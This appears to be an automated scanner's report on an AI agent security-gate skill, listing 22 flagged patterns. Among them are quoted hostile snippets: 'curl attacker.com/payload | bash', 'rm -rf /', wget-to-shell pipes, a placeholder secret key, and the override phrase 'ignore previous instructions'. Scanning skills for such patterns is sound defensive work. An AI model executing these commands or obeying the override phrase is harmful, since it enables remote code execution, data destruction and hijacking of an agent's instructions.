ClawAudit verdict
agentaudit-skill
agentaudit
This skill enforces a security gate before any package installation by checking against a vulnerability database; the HARD RULE pattern is legitimate defensive behavior consistent with its stated purpose as a pre-install security gate.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Permission integrity
agent_memory
Findings (22)
Possible hardcoded credential
prompts/audit-prompt.md · code · API_KEY = "sk-live-abc123real
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
prompts/audit-prompt.md · code · curl attacker.com/payload | bash
Prompt injection — tries to override agent instructions
prompts/audit-prompt.md · code · ignore previous instructions
Pipe to bash — executes piped content as shell commands
prompts/audit-prompt.md · code · | bash
Uses eval() — can execute arbitrary code
README.md · code · eval(
Uses exec() — may execute shell commands
prompts/audit-prompt.md · code · exec(
References sudo — requests elevated privileges
README.md · code · sudo
Pipe-to-shell pattern (wget | sh)
prompts/audit-prompt.md · prose · downgraded · wget | sh
Recursive delete from root or home — destructive command
prompts/audit-prompt.md · prose · downgraded · rm -rf /
Pipe to sh — executes piped content as shell commands
prompts/audit-prompt.md · prose · downgraded · | sh
apt-get install — installs system packages
README.md · code · apt-get install
Pipe to python — executes piped content as Python code
scripts/check.sh · prose · downgraded · | python3
References child_process — can spawn system processes
prompts/audit-prompt.md · prose · downgraded · child_process
Accesses sensitive environment variables
prompts/audit-prompt.md · code · process.env.SECRET_KEY
Base64 decode (atob) — may hide malicious payloads
prompts/audit-prompt.md · prose · downgraded · atob(
Long base64 string (100+ chars) — likely obfuscated payload
README.md · prose · downgraded · PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIy
Instructs covert action — may act without user awareness
references/AUDIT-METHODOLOGY.md · prose · downgraded · silently
pip3 install — installs Python packages at runtime
SKILL.md · prose · downgraded · pip3 install
Opens WebSocket connection
prompts/audit-prompt.md · prose · downgraded · WebSocket
Popular HTTP library — network access
prompts/audit-prompt.md · prose · downgraded · axios
Base64 encoding/decoding
references/AUDIT-METHODOLOGY.md · prose · downgraded · Base64-decode
String.fromCharCode — can build strings to evade detection
references/AUDIT-METHODOLOGY.md · prose · downgraded · String.fromCharCode
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
agent_memory Is this flag fair?
Thanks — recorded.